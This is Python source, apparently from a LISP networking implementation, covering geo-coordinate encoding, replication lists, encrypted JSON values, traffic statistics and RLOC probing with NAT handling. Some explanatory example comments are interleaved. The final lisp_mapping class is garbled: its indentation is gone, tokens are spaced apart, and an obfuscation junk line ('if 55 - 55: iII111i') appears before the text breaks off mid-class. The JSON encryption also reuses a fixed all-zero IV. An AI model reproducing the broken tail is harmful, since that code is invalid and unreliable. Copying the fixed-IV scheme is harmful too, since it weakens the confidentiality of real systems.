    def parse_geo_string(self, geo_str):
        index = geo_str.find("]")
        if (index != -1): geo_str = geo_str[index + 1::]

        #
        # An optional "/<radius>" suffix makes this a geo-prefix rather
        # than a geo-point.
        #
        if (geo_str.find("/") != -1):
            geo_str, radius = geo_str.split("/")
            self.radius = int(radius)

        geo_str = geo_str.split("-")
        if (len(geo_str) < 8): return(False)

        latitude = geo_str[0:4]
        longitude = geo_str[4:8]

        #
        # An optional altitude follows the longitude.
        #
        if (len(geo_str) > 8): self.altitude = int(geo_str[8])

        #
        # Parse latitude degrees-minutes-seconds-[N|S]; north is stored
        # negative internally.
        #
        self.latitude = int(latitude[0])
        self.lat_mins = int(latitude[1])
        self.lat_secs = int(latitude[2])
        if (latitude[3] == "N"): self.latitude = -self.latitude

        #
        # Parse longitude degrees-minutes-seconds-[E|W]; east is stored
        # negative internally.
        #
        self.longitude = int(longitude[0])
        self.long_mins = int(longitude[1])
        self.long_secs = int(longitude[2])
        if (longitude[3] == "E"): self.longitude = -self.longitude
        return(True)

    def print_geo(self):
        lat_hemi = "N" if self.latitude < 0 else "S"
        lon_hemi = "E" if self.longitude < 0 else "W"

        geo_str = "{}-{}-{}-{}-{}-{}-{}-{}".format(abs(self.latitude),
            self.lat_mins, self.lat_secs, lat_hemi, abs(self.longitude),
            self.long_mins, self.long_secs, lon_hemi)

        if (self.no_geo_altitude() == False):
            geo_str += "-" + str(self.altitude)

        #
        # Append radius if this is a geo-prefix.
        #
        if (self.radius != 0): geo_str += "/{}".format(self.radius)
        return(geo_str)

    def geo_url(self):
        zoom = os.getenv("LISP_GEO_ZOOM_LEVEL")
        if (zoom == None or zoom == "" or zoom.isdigit() == False):
            zoom = "10"
        lat, lon = self.dms_to_decimal()
        url = ("http://maps.googleapis.com/maps/api/staticmap?center={},{}" +
            "&markers=color:blue%7Clabel:lisp%7C{},{}" +
            "&zoom={}&size=1024x1024&sensor=false").format(lat, lon, lat,
            lon, zoom)
        return(url)

    def print_geo_url(self):
        geo_str = self.print_geo()
        if (self.radius == 0):
            url = self.geo_url()
            string = "<a href='{}'>{}</a>".format(url, geo_str)
        else:
            url = geo_str.replace("/", "-")
            string = "<a href='/lisp/geo-map/{}'>{}</a>".format(url, geo_str)
        return(string)

    def dms_to_decimal(self):
        #
        # Convert degrees-minutes-seconds to signed decimal degrees.
        # North latitude and east longitude come out positive.
        #
        degrees, mins, secs = self.latitude, self.lat_mins, self.lat_secs
        decimal = float(abs(degrees))
        decimal += float(mins * 60 + secs) / 3600
        if (degrees > 0): decimal = -decimal
        latitude = decimal

        degrees, mins, secs = self.longitude, self.long_mins, self.long_secs
        decimal = float(abs(degrees))
        decimal += float(mins * 60 + secs) / 3600
        if (degrees > 0): decimal = -decimal
        longitude = decimal
        return((latitude, longitude))

    def get_distance(self, geo_point):
        dms1 = self.dms_to_decimal()
        dms2 = geo_point.dms_to_decimal()
        distance = geopy.distance.distance(dms1, dms2)
        return(distance.km)

    def point_in_circle(self, geo_point):
        km = self.get_distance(geo_point)
        return(km <= self.radius)

    def encode_geo(self):
        lcaf_afi = socket.htons(LISP_AFI_LCAF)
        lcaf_length = socket.htons(20 + 2)
        flags = 0

        lat = abs(self.latitude)
        lat_msecs = ((self.lat_mins * 60) + self.lat_secs) * 1000
        if (self.latitude < 0): flags |= 0x40

        lon = abs(self.longitude)
        lon_msecs = ((self.long_mins * 60) + self.long_secs) * 1000
        if (self.longitude < 0): flags |= 0x20

        alt = 0
        if (self.no_geo_altitude() == False):
            alt = socket.htonl(self.altitude)
            flags |= 0x10

        radius = socket.htons(self.radius)
        if (radius != 0): flags |= 0x06

        packet = struct.pack("HBBBBH", lcaf_afi, 0, 0,
            LISP_LCAF_GEO_COORD_TYPE, 0, lcaf_length)
        packet += struct.pack("BBHBBHBBHIHHH", flags, 0, 0, lat,
            lat_msecs >> 16, socket.htons(lat_msecs & 0x0ffff), lon,
            lon_msecs >> 16, socket.htons(lon_msecs & 0xffff), alt,
            radius, 0, 0)
        return(packet)

    def decode_geo(self, packet, lcaf_len, radius_hi):
        packet_format = "BBHBBHBBHIHHH"
        format_size = struct.calcsize(packet_format)
        if (lcaf_len < format_size): return(None)

        flags, r1, r2, lat, lat_hi, lat_low, lon, lon_hi, lon_low, alt, \
            radius, r3, afi = struct.unpack(packet_format,
            packet[:format_size])

        #
        # A nested LCAF AFI is not supported.
        #
        afi = socket.ntohs(afi)
        if (afi == LISP_AFI_LCAF): return(None)

        if (flags & 0x40): lat = -lat
        self.latitude = lat
        lat_secs = old_div(((lat_hi << 16) | socket.ntohs(lat_low)), 1000)
        self.lat_mins = old_div(lat_secs, 60)
        self.lat_secs = lat_secs % 60

        if (flags & 0x20): lon = -lon
        self.longitude = lon
        lon_secs = old_div(((lon_hi << 16) | socket.ntohs(lon_low)), 1000)
        self.long_mins = old_div(lon_secs, 60)
        self.long_secs = lon_secs % 60

        self.altitude = socket.ntohl(alt) if (flags & 0x10) else -1
        radius = socket.ntohs(radius)
        self.radius = radius if (flags & 0x02) else radius * 1000

        self.geo_name = None
        packet = packet[format_size::]

        if (afi != 0):
            self.rloc.afi = afi
            packet = self.rloc.unpack_address(packet)
            self.rloc.mask_len = self.rloc.host_mask_len()

        return(packet)

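#
# Illustrative sketch (not part of the original module): geo-coordinates
# parse from "lat-mins-secs-[N|S]-lon-mins-secs-[E|W][-alt][/radius]" and
# round-trip through print_geo():
#
#   >>> geo = lisp_geo("site")
#   >>> geo.parse_geo_string("37-23-30-N-121-57-20-W-10/5")
#   True
#   >>> geo.print_geo()
#   '37-23-30-N-121-57-20-W-10/5'
#
# dms_to_decimal() then returns roughly (37.392, -121.956), i.e. standard
# signed decimal degrees with north/east positive.
#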
class lisp_rle_node(object):
    def __init__(self):
        self.address = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.level = 0
        self.translated_port = 0
        self.rloc_name = None

    def copy_rle_node(self):
        rle_node = lisp_rle_node()
        rle_node.address.copy_address(self.address)
        rle_node.level = self.level
        rle_node.translated_port = self.translated_port
        rle_node.rloc_name = self.rloc_name
        return(rle_node)

    def store_translated_rloc(self, rloc, port):
        self.address.copy_address(rloc)
        self.translated_port = port

    def get_encap_keys(self):
        port = "4341" if self.translated_port == 0 else \
            str(self.translated_port)
        addr_str = self.address.print_address_no_iid() + ":" + port

        try:
            keys = lisp_crypto_keys_by_rloc_encap[addr_str]
            if (keys[1]): return(keys[1].encrypt_key, keys[1].icv_key)
            return(None, None)
        except:
            return(None, None)

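#
# Illustrative sketch (not part of the original module): encap crypto keys
# are looked up by "<rloc-address>:<port>" in the global
# lisp_crypto_keys_by_rloc_encap table; port 4341 (the LISP data port) is
# assumed when no NAT-translated port is stored:
#
#   node = lisp_rle_node()
#   ekey, ikey = node.get_encap_keys()   # (None, None) until keys exist
#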
class lisp_rle(object):
    def __init__(self, name):
        self.rle_name = name
        self.rle_nodes = []
        self.rle_forwarding_list = []

    def copy_rle(self):
        rle = lisp_rle(self.rle_name)
        for rle_node in self.rle_nodes:
            rle.rle_nodes.append(rle_node.copy_rle_node())
        rle.build_forwarding_list()
        return(rle)

    def print_rle(self, html, do_formatting):
        rle_str = ""
        for rle_node in self.rle_nodes:
            port = rle_node.translated_port

            rloc_name = ""
            if (rle_node.rloc_name != None):
                rloc_name = rle_node.rloc_name
                if (do_formatting): rloc_name = blue(rloc_name, html)
                rloc_name = "({})".format(rloc_name)

            addr_str = rle_node.address.print_address_no_iid()
            if (rle_node.address.is_local()): addr_str = red(addr_str, html)
            rle_str += "{}{}{}, ".format(addr_str,
                "" if port == 0 else ":" + str(port), rloc_name)

        return(rle_str[0:-2] if rle_str != "" else "")

    def build_forwarding_list(self):
        #
        # Find the replication level just above the local node's level.
        #
        level = -1
        for rle_node in self.rle_nodes:
            if (level == -1):
                if (rle_node.address.is_local()): level = rle_node.level
            else:
                if (rle_node.level > level): break

        level = 0 if level == -1 else rle_node.level

        #
        # Keep the nodes at that level, excluding our own local RLOC
        # unless we are an RTR.
        #
        self.rle_forwarding_list = []
        for rle_node in self.rle_nodes:
            if (rle_node.level == level or (level == 0 and
                rle_node.level == 128)):
                if (lisp_i_am_rtr == False and rle_node.address.is_local()):
                    addr_str = rle_node.address.print_address_no_iid()
                    lprint("Exclude local RLE RLOC {}".format(addr_str))
                    continue
                self.rle_forwarding_list.append(rle_node)

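#
# Illustrative sketch (not part of the original module): an RLE is a
# replication tree of nodes grouped by level; build_forwarding_list()
# keeps only the level a packet should fan out to next, so replication
# proceeds one level at a time:
#
#   rle = lisp_rle("tree")            # nodes are added from an RLE LCAF
#   rle.build_forwarding_list()       # choose the next replication level
#   for node in rle.rle_forwarding_list:
#       pass                          # encapsulate one copy per node
#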
class lisp_json(object):
    def __init__(self, name, string, encrypted=False, ms_encrypt=False):
        if (type(string) == bytes): string = string.decode()

        self.json_name = name
        self.json_encrypted = False
        try:
            json.loads(string)
        except:
            lprint("Invalid JSON string: '{}'".format(string))
            string = '{ "?" : "?" }'
        self.json_string = string

        #
        # When a map-server is configured with JSON keys, encrypt the
        # values with the first configured key before use.
        #
        if (len(lisp_ms_json_keys) != 0):
            if (ms_encrypt == False): return
            self.json_key_id = list(lisp_ms_json_keys.keys())[0]
            self.json_key = lisp_ms_json_keys[self.json_key_id]
            self.encrypt_json()

        #
        # "lig" can decrypt returned JSON when the LISP_JSON_KEY
        # environment variable is set to "[<key-id>]<key>" or "<key>".
        #
        if (lisp_log_id == "lig" and encrypted):
            key = os.getenv("LISP_JSON_KEY")
            if (key != None):
                index = -1
                if (key[0] == "[" and "]" in key):
                    index = key.find("]")
                    self.json_key_id = int(key[1:index])
                self.json_key = key[index + 1::]
                self.decrypt_json()

    def add(self):
        self.delete()
        lisp_json_list[self.json_name] = self

    def delete(self):
        if (self.json_name in lisp_json_list):
            del(lisp_json_list[self.json_name])
            lisp_json_list[self.json_name] = None

    def print_json(self, html):
        good_string = self.json_string
        marker = "***"
        if (html): marker = red(marker, html)
        bad_string = marker + self.json_string + marker
        if (self.valid_json()): return(good_string)
        return(bad_string)

    def valid_json(self):
        try:
            json.loads(self.json_string)
        except:
            return(False)
        return(True)

    def encrypt_json(self):
        key = self.json_key.zfill(32)
        iv = "0" * 8

        entries = json.loads(self.json_string)
        for entry in entries:
            value = entries[entry]
            if (type(value) != str): value = str(value)
            value = chacha.ChaCha(key, iv).encrypt(value)
            entries[entry] = binascii.hexlify(value)

        self.json_string = json.dumps(entries)
        self.json_encrypted = True

    def decrypt_json(self):
        key = self.json_key.zfill(32)
        iv = "0" * 8

        entries = json.loads(self.json_string)
        for entry in entries:
            value = binascii.unhexlify(entries[entry])
            entries[entry] = chacha.ChaCha(key, iv).encrypt(value)

        try:
            self.json_string = json.dumps(entries)
            self.json_encrypted = False
        except:
            pass

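#
# Illustrative sketch (not part of the original module): a lisp_json
# value that fails json.loads() is replaced with a '{ "?" : "?" }'
# placeholder, and print_json() brackets invalid strings with "***":
#
#   >>> j = lisp_json("demo", '{"rloc" : "10.0.0.1"}')
#   >>> j.valid_json()
#   True
#   >>> j.print_json(False)
#   '{"rloc" : "10.0.0.1"}'
#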
class lisp_stats(object):
    def __init__(self):
        self.packet_count = 0
        self.byte_count = 0
        self.last_rate_check = 0
        self.last_packet_count = 0
        self.last_byte_count = 0
        self.last_increment = None

    def increment(self, octets):
        self.packet_count += 1
        self.byte_count += octets
        self.last_increment = lisp_get_timestamp()

    def recent_packet_sec(self):
        if (self.last_increment == None): return(False)
        elapsed = time.time() - self.last_increment
        return(elapsed <= 1)

    def recent_packet_min(self):
        if (self.last_increment == None): return(False)
        elapsed = time.time() - self.last_increment
        return(elapsed <= 60)

    def stat_colors(self, c1, c2, html):
        if (self.recent_packet_sec()):
            return(green_last_sec(c1), green_last_sec(c2))
        if (self.recent_packet_min()):
            return(green_last_min(c1), green_last_min(c2))
        return(c1, c2)

    def normalize(self, count):
        count = str(count)
        digits = len(count)
        if (digits > 12):
            count = count[0:-10] + "." + count[-10:-7] + "T"
            return(count)
        if (digits > 9):
            count = count[0:-9] + "." + count[-9:-7] + "B"
            return(count)
        if (digits > 6):
            count = count[0:-6] + "." + count[-6] + "M"
            return(count)
        return(count)

    def get_stats(self, summary, html):
        prev_rate_check = self.last_rate_check
        prev_packet_count = self.last_packet_count
        prev_byte_count = self.last_byte_count
        self.last_rate_check = lisp_get_timestamp()
        self.last_packet_count = self.packet_count
        self.last_byte_count = self.byte_count

        #
        # Compute packet and bit rates since the last call.
        #
        rate_diff = self.last_rate_check - prev_rate_check
        if (rate_diff == 0):
            packet_rate = 0
            bit_rate = 0
        else:
            packet_rate = int(old_div((self.packet_count -
                prev_packet_count), rate_diff))
            bit_rate = old_div((self.byte_count - prev_byte_count),
                rate_diff)
            bit_rate = old_div((bit_rate * 8), 1000000)
            bit_rate = round(bit_rate, 2)

        #
        # Normalize long counters with M, B, and T qualifiers.
        #
        packets = self.normalize(self.packet_count)
        bytecount = self.normalize(self.byte_count)

        if (summary):
            sep = "<br>" if html else ""
            packets, bytecount = self.stat_colors(packets, bytecount, html)
            counts = "packet-count: {}{}byte-count: {}".format(packets,
                sep, bytecount)
            stats = "packet-rate: {} pps\nbit-rate: {} Mbps".format(
                packet_rate, bit_rate)
            if (html != ""): stats = lisp_span(counts, stats)
        else:
            prate = str(packet_rate)
            brate = str(bit_rate)
            if (html):
                packets = lisp_print_cour(packets)
                prate = lisp_print_cour(prate)
                bytecount = lisp_print_cour(bytecount)
                brate = lisp_print_cour(brate)
            sep = "<br>" if html else ", "

            stats = ("packet-count: {}{}packet-rate: {} pps{}byte-count: " +
                "{}{}bit-rate: {} mbps").format(packets, sep, prate, sep,
                bytecount, sep, brate)

        return(stats)

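#
# Illustrative sketch (not part of the original module): normalize()
# abbreviates large counters with M/B/T suffixes:
#
#   >>> s = lisp_stats()
#   >>> s.normalize(1234567)
#   '1.2M'
#   >>> s.normalize(12345678901)
#   '12.34B'
#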
lisp_decap_stats = {
    "good-packets": lisp_stats(), "ICV-error": lisp_stats(),
    "checksum-error": lisp_stats(), "lisp-header-error": lisp_stats(),
    "no-decrypt-key": lisp_stats(), "bad-inner-version": lisp_stats(),
    "outer-header-error": lisp_stats()
}
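#
# Illustrative sketch (not part of the original module): decapsulation
# counters are bumped by name, e.g. on an ICV check failure one might do:
#
#   lisp_decap_stats["ICV-error"].increment(len(packet))
#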
class lisp_rloc(object):
    def __init__(self, recurse=True):
        self.rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.rloc_name = None
        self.interface = None
        self.translated_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.translated_port = 0
        self.priority = 255
        self.weight = 0
        self.mpriority = 255
        self.mweight = 0
        self.uptime = lisp_get_timestamp()
        self.state = LISP_RLOC_UP_STATE
        self.last_state_change = None
        self.rle_name = None
        self.elp_name = None
        self.geo_name = None
        self.json_name = None
        self.geo = None
        self.elp = None
        self.rle = None
        self.json = None
        self.stats = lisp_stats()
        self.last_rloc_probe = None
        self.last_rloc_probe_reply = None
        self.rloc_probe_rtt = -1
        self.recent_rloc_probe_rtts = [-1, -1, -1]
        self.rloc_probe_hops = "?/?"
        self.recent_rloc_probe_hops = ["?/?", "?/?", "?/?"]
        self.rloc_probe_latency = "?/?"
        self.recent_rloc_probe_latencies = ["?/?", "?/?", "?/?"]
        self.last_rloc_probe_nonce = 0
        self.echo_nonce_capable = False
        self.map_notify_requested = False
        self.rloc_next_hop = None
        self.next_rloc = None
        self.multicast_rloc_probe_list = {}

        if (recurse == False): return

        #
        # When there are multiple default routes, chain a deep-copied
        # lisp_rloc per additional next-hop so each path can be probed
        # and used independently.
        #
        next_hops = lisp_get_default_route_next_hops()
        if (next_hops == [] or len(next_hops) == 1): return

        self.rloc_next_hop = next_hops[0]
        last_rloc = self
        for nh in next_hops[1::]:
            rloc = copy.deepcopy(self)
            rloc.rloc_next_hop = nh
            last_rloc.next_rloc = rloc
            last_rloc = rloc

    def up_state(self):
        return(self.state == LISP_RLOC_UP_STATE)

    def unreach_state(self):
        return(self.state == LISP_RLOC_UNREACH_STATE)

    def no_echoed_nonce_state(self):
        return(self.state == LISP_RLOC_NO_ECHOED_NONCE_STATE)

    def down_state(self):
        return(self.state in [LISP_RLOC_DOWN_STATE,
            LISP_RLOC_ADMIN_DOWN_STATE])

    def print_state(self):
        if (self.state is LISP_RLOC_UNKNOWN_STATE):
            return("unknown-state")
        if (self.state is LISP_RLOC_UP_STATE):
            return("up-state")
        if (self.state is LISP_RLOC_DOWN_STATE):
            return("down-state")
        if (self.state is LISP_RLOC_ADMIN_DOWN_STATE):
            return("admin-down-state")
        if (self.state is LISP_RLOC_UNREACH_STATE):
            return("unreach-state")
        if (self.state is LISP_RLOC_NO_ECHOED_NONCE_STATE):
            return("no-echoed-nonce-state")
        return("invalid-state")

    def print_rloc(self, indent):
        uts = lisp_print_elapsed(self.uptime)
        lprint("{}rloc {}, uptime {}, {}, parms {}/{}/{}/{}".format(indent,
            red(self.rloc.print_address(), False), uts, self.print_state(),
            self.priority, self.weight, self.mpriority, self.mweight))

    def print_rloc_name(self, cour=False):
        if (self.rloc_name == None): return("")
        rloc_name = self.rloc_name
        if (cour): rloc_name = lisp_print_cour(rloc_name)
        return('rloc-name: {}'.format(blue(rloc_name, cour)))

    def store_rloc_from_record(self, rloc_record, nonce, source):
        port = LISP_DATA_PORT
        self.rloc.copy_address(rloc_record.rloc)
        self.rloc_name = rloc_record.rloc_name

        #
        # If this RLOC is behind a NAT, use the translated address and
        # port from stored NAT state.
        #
        rloc = self.rloc
        if (rloc.is_null() == False):
            nat_info = lisp_get_nat_info(rloc, self.rloc_name)
            if (nat_info):
                port = nat_info.port
                youngest = lisp_nat_state_info[self.rloc_name][0]
                addr_str = rloc.print_address_no_iid()
                rloc_str = red(addr_str, False)
                name_str = "" if self.rloc_name == None else \
                    blue(self.rloc_name, False)

                #
                # If the matched NAT state timed out, fall back to the
                # youngest stored entry, which may also have timed out.
                #
                if (nat_info.timed_out()):
                    lprint(("  Matched stored NAT state timed out for " +
                        "RLOC {}:{}, {}").format(rloc_str, port, name_str))

                    nat_info = None if (nat_info == youngest) else youngest
                    if (nat_info and nat_info.timed_out()):
                        port = nat_info.port
                        rloc_str = red(nat_info.address, False)
                        lprint(("  Youngest stored NAT state timed out " +
                            " for RLOC {}:{}, {}").format(rloc_str, port,
                            name_str))
                        nat_info = None

                #
                # Use the NAT-translated address and port.
                #
                if (nat_info):
                    if (nat_info.address != addr_str):
                        lprint("RLOC conflict, RLOC-record {}, NAT state {}".\
                            format(rloc_str, red(nat_info.address, False)))
                        self.rloc.store_address(nat_info.address)

                    rloc_str = red(nat_info.address, False)
                    port = nat_info.port
                    lprint("  Use NAT translated RLOC {}:{} for {}".format(
                        rloc_str, port, name_str))
                    self.store_translated_rloc(rloc, port)

        self.geo = rloc_record.geo
        self.elp = rloc_record.elp
        self.json = rloc_record.json

        #
        # Store translated encap-ports for RLE nodes behind NATs.
        #
        self.rle = rloc_record.rle
        if (self.rle):
            for rle_node in self.rle.rle_nodes:
                rloc_name = rle_node.rloc_name
                nat_info = lisp_get_nat_info(rle_node.address, rloc_name)
                if (nat_info == None): continue

                port = nat_info.port
                name_str = rloc_name
                if (name_str): name_str = blue(rloc_name, False)

                lprint(("  Store translated encap-port {} for RLE-" +
                    "node {}, rloc-name '{}'").format(port,
                    rle_node.address.print_address_no_iid(), name_str))
                rle_node.translated_port = port

        self.priority = rloc_record.priority
        self.mpriority = rloc_record.mpriority
        self.weight = rloc_record.weight
        self.mweight = rloc_record.mweight
        if (rloc_record.reach_bit and rloc_record.local_bit and
            rloc_record.probe_bit == False): self.state = LISP_RLOC_UP_STATE

        #
        # Store encap security keys when the RLOC matches the packet
        # source.
        #
        match = source.is_exact_match(rloc_record.rloc) if source != None \
            else None
        if (rloc_record.keys != None and match):
            key = rloc_record.keys[1]
            if (key != None):
                addr_str = rloc_record.rloc.print_address_no_iid() + ":" + \
                    str(port)
                key.add_key_by_rloc(addr_str, True)
                lprint("  Store encap-keys for nonce 0x{}, RLOC {}".format(
                    lisp_hex_string(nonce), red(addr_str, False)))

        return(port)

    def store_translated_rloc(self, rloc, port):
        self.rloc.copy_address(rloc)
        self.translated_rloc.copy_address(rloc)
        self.translated_port = port

    def is_rloc_translated(self):
        return(self.translated_rloc.is_null() == False)

    def rloc_exists(self):
        if (self.rloc.is_null() == False): return(True)
        if (self.rle_name or self.geo_name or self.elp_name or
            self.json_name): return(False)
        return(True)

    def is_rtr(self):
        return((self.priority == 254 and self.mpriority == 255 and
            self.weight == 0 and self.mweight == 0))

    def print_state_change(self, new_state):
        current_state = self.print_state()
        string = "{} -> {}".format(current_state, new_state)
        if (new_state == "up" and self.unreach_state()):
            string = bold(string, False)
        return(string)

    def print_rloc_probe_rtt(self):
        if (self.rloc_probe_rtt == -1): return("none")
        return(self.rloc_probe_rtt)

    def print_recent_rloc_probe_rtts(self):
        rtts = str(self.recent_rloc_probe_rtts)
        rtts = rtts.replace("-1", "?")
        return(rtts)

    def compute_rloc_probe_rtt(self):
        last_rtt = self.rloc_probe_rtt
        self.rloc_probe_rtt = -1
        if (self.last_rloc_probe_reply == None): return
        if (self.last_rloc_probe == None): return
        self.rloc_probe_rtt = self.last_rloc_probe_reply - \
            self.last_rloc_probe
        self.rloc_probe_rtt = round(self.rloc_probe_rtt, 3)
        recent = self.recent_rloc_probe_rtts
        self.recent_rloc_probe_rtts = [last_rtt] + recent[0:-1]

    def print_rloc_probe_hops(self):
        return(self.rloc_probe_hops)

    def print_recent_rloc_probe_hops(self):
        hops = str(self.recent_rloc_probe_hops)
        return(hops)

    def store_rloc_probe_hops(self, to_hops, from_ttl):
        if (to_hops == 0):
            to_hops = "?"
        elif (to_hops < old_div(LISP_RLOC_PROBE_TTL, 2)):
            to_hops = "!"
        else:
            to_hops = str(LISP_RLOC_PROBE_TTL - to_hops)

        if (from_ttl < old_div(LISP_RLOC_PROBE_TTL, 2)):
            from_hops = "!"
        else:
            from_hops = str(LISP_RLOC_PROBE_TTL - from_ttl)

        last_hops = self.rloc_probe_hops
        self.rloc_probe_hops = to_hops + "/" + from_hops
        recent = self.recent_rloc_probe_hops
        self.recent_rloc_probe_hops = [last_hops] + recent[0:-1]

    def store_rloc_probe_latencies(self, json_telemetry):
        telemetry = lisp_decode_telemetry(json_telemetry)

        #
        # One-way latencies derived from the telemetry timestamps.
        #
        forward = round(float(telemetry["etr-in"]) -
            float(telemetry["itr-out"]), 3)
        reverse = round(float(telemetry["itr-in"]) -
            float(telemetry["etr-out"]), 3)

        last_latency = self.rloc_probe_latency
        self.rloc_probe_latency = str(forward) + "/" + str(reverse)
        recent = self.recent_rloc_probe_latencies
        self.recent_rloc_probe_latencies = [last_latency] + recent[0:-1]

    def print_rloc_probe_latency(self):
        return(self.rloc_probe_latency)

    def print_recent_rloc_probe_latencies(self):
        latencies = str(self.recent_rloc_probe_latencies)
        return(latencies)

    def process_rloc_probe_reply(self, ts, nonce, eid, group, hc, ttl, jt):
        #
        # Find the RLOC (possibly chained per next-hop) that sent the
        # probe with this nonce.
        #
        rloc = self
        while (True):
            if (rloc.last_rloc_probe_nonce == nonce): break
            rloc = rloc.next_rloc
            if (rloc == None):
                lprint("    No matching nonce state found for nonce 0x{}".\
                    format(lisp_hex_string(nonce)))
                return

        #
        # Mark the RLOC up and compute RTT from the probe timestamps.
        #
        rloc.last_rloc_probe_reply = ts
        rloc.compute_rloc_probe_rtt()
        state_change = rloc.print_state_change("up")
        if (rloc.state != LISP_RLOC_UP_STATE):
            lisp_update_rtr_updown(rloc.rloc, True)
            rloc.state = LISP_RLOC_UP_STATE
            rloc.last_state_change = lisp_get_timestamp()
            mc = lisp_map_cache.lookup_cache(eid, True)
            if (mc): lisp_write_ipc_map_cache(True, mc)

        #
        # Store hop counts, and latencies when telemetry is present.
        #
        rloc.store_rloc_probe_hops(hc, ttl)

        if (jt): rloc.store_rloc_probe_latencies(jt)

        probe = bold("RLOC-probe reply", False)
        addr_str = rloc.rloc.print_address_no_iid()
        rtt = bold(str(rloc.print_rloc_probe_rtt()), False)
        port = ":{}".format(self.translated_port) if \
            self.translated_port != 0 else ""

        nh = ""
        if (rloc.rloc_next_hop != None):
            device, gateway = rloc.rloc_next_hop
            nh = ", nh {}({})".format(gateway, device)

        latency = bold(rloc.print_rloc_probe_latency(), False)
        latency = ", latency {}".format(latency) if jt else ""

        eid_str = green(lisp_print_eid_tuple(eid, group), False)

        lprint(("    Received {} from {}{} for {}, {}, rtt {}{}, " +
            "to-ttl/from-ttl {}{}").format(probe, red(addr_str, False),
            port, eid_str, state_change, rtt, nh,
            str(hc) + "/" + str(ttl), latency))

        if (rloc.rloc_next_hop == None): return

        #
        # With multiple next-hops, install a host route via the one with
        # the best (lowest) probe RTT.
        #
        rloc = None
        best = None
        while (True):
            rloc = self if rloc == None else rloc.next_rloc
            if (rloc == None): break
            if (rloc.up_state() == False): continue
            if (rloc.rloc_probe_rtt == -1): continue

            if (best == None): best = rloc
            if (rloc.rloc_probe_rtt < best.rloc_probe_rtt): best = rloc

        if (best != None):
            device, gateway = best.rloc_next_hop
            nh = bold("nh {}({})".format(gateway, device), False)
            lprint("    Install host-route via best {}".format(nh))
            lisp_install_host_route(addr_str, None, False)
            lisp_install_host_route(addr_str, gateway, True)

    def add_to_rloc_probe_list(self, eid, group):
        addr_str = self.rloc.print_address_no_iid()
        port = self.translated_port
        if (port != 0): addr_str += ":" + str(port)

        if (addr_str not in lisp_rloc_probe_list):
            lisp_rloc_probe_list[addr_str] = []

        if (group.is_null()): group.instance_id = 0
        for r, e, g in lisp_rloc_probe_list[addr_str]:
            if (e.is_exact_match(eid) and g.is_exact_match(group)):
                if (r == self):
                    if (lisp_rloc_probe_list[addr_str] == []):
                        lisp_rloc_probe_list.pop(addr_str)
                    return
                lisp_rloc_probe_list[addr_str].remove([r, e, g])
                break

        lisp_rloc_probe_list[addr_str].append([self, eid, group])

        #
        # Inherit unreachable state from the first RLOC on the list.
        #
        rloc = lisp_rloc_probe_list[addr_str][0][0]
        if (rloc.state == LISP_RLOC_UNREACH_STATE):
            self.state = LISP_RLOC_UNREACH_STATE
            self.last_state_change = lisp_get_timestamp()

    def delete_from_rloc_probe_list(self, eid, group):
        addr_str = self.rloc.print_address_no_iid()
        port = self.translated_port
        if (port != 0): addr_str += ":" + str(port)
        if (addr_str not in lisp_rloc_probe_list): return

        entry = []
        for e in lisp_rloc_probe_list[addr_str]:
            if (e[0] != self): continue
            if (e[1].is_exact_match(eid) == False): continue
            if (e[2].is_exact_match(group) == False): continue
            entry = e
            break

        if (entry == []): return

        try:
            lisp_rloc_probe_list[addr_str].remove(entry)
            if (lisp_rloc_probe_list[addr_str] == []):
                lisp_rloc_probe_list.pop(addr_str)
        except:
            return

    def print_rloc_probe_state(self, trailing_linefeed):
        output = ""
        rloc = self
        while (True):
            sent = rloc.last_rloc_probe
            if (sent == None): sent = 0
            received = rloc.last_rloc_probe_reply
            if (received == None): received = 0
            rtt = rloc.print_rloc_probe_rtt()
            indent = space(4)

            if (rloc.rloc_next_hop == None):
                output += "RLOC-Probing:\n"
            else:
                device, gateway = rloc.rloc_next_hop
                output += "RLOC-Probing for nh {}({}):\n".format(gateway,
                    device)

            output += ("{}RLOC-probe request sent: {}\n{}RLOC-probe reply " +
                "received: {}, rtt {}").format(indent,
                lisp_print_elapsed(sent), indent,
                lisp_print_elapsed(received), rtt)

            if (trailing_linefeed): output += "\n"

            rloc = rloc.next_rloc
            if (rloc == None): break
            output += "\n"

        return(output)

    def get_encap_keys(self):
        port = "4341" if self.translated_port == 0 else \
            str(self.translated_port)
        addr_str = self.rloc.print_address_no_iid() + ":" + port

        try:
            keys = lisp_crypto_keys_by_rloc_encap[addr_str]
            if (keys[1]): return(keys[1].encrypt_key, keys[1].icv_key)
            return(None, None)
        except:
            return(None, None)

    def rloc_recent_rekey(self):
        port = "4341" if self.translated_port == 0 else \
            str(self.translated_port)
        addr_str = self.rloc.print_address_no_iid() + ":" + port

        try:
            key = lisp_crypto_keys_by_rloc_encap[addr_str][1]
            if (key == None): return(False)
            if (key.last_rekey == None): return(True)
            return(time.time() - key.last_rekey < 1)
        except:
            return(False)

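#
# Illustrative sketch (not part of the original module): the RTT, hops,
# and latency histories are three-deep shift registers; each probe reply
# pushes the previous value onto the recent list:
#
#   >>> r = lisp_rloc()
#   >>> r.last_rloc_probe = 100.0
#   >>> r.last_rloc_probe_reply = 100.25
#   >>> r.compute_rloc_probe_rtt()
#   >>> r.rloc_probe_rtt
#   0.25
#   >>> r.recent_rloc_probe_rtts    # previous rtt (-1) shifted in
#   [-1, -1, -1]
#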
class lisp_mapping ( object ) :
def __init__ ( self , eid , group , rloc_set ) :
self . eid = eid
if ( eid == "" ) : self . eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . group = group
if ( group == "" ) : self . group = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . rloc_set = rloc_set
self . best_rloc_set = [ ]
self . build_best_rloc_set ( )
self . uptime = lisp_get_timestamp ( )
self . action = LISP_NO_ACTION
self . expires = None
self . map_cache_ttl = None
self . register_ttl = LISP_REGISTER_TTL
self . last_refresh_time = self . uptime
self . source_cache = None
self . map_replies_sent = 0
self . mapping_source = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . use_mr_name = "all"
self . use_ms_name = "all"
self . stats = lisp_stats ( )
self . dynamic_eids = None
self . checkpoint_entry = False
self . secondary_iid = None
self . signature_eid = False
self . gleaned = False
self . recent_sources = { }
self . last_multicast_map_request = 0
self . subscribed_eid = None
self . subscribed_group = None
if 55 - 55: iII111i
